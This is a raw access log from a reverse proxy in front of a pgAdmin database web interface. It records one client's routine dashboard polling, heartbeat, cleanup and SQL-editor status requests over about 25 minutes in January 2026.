[Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:10:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:10:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:10:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:10:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:10:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:11:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:11:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:11:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:12:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:12:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:13:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:13:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:14:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:14:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:15:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:15:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:16:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:16:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:16:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:17:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:17:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:18:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:18:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:18:36 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:18:38 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:18:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:18:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:18:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:18:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:19:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:19:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:19:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:19:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:19:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:19:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:19:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:19:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:19:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:19:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:19:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:20:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:20:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:21:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:21:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:21:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:22:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:22:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:23:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:23:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:24:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:24:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:25:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:25:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:26:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:26:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:26:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:27:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:27:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:28:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:28:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:29:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:29:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:30:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:30:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:31:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:31:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:31:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:32:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:32:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:33:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:33:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:34:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:34:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:35:55 +0000] - 200 200 - POST 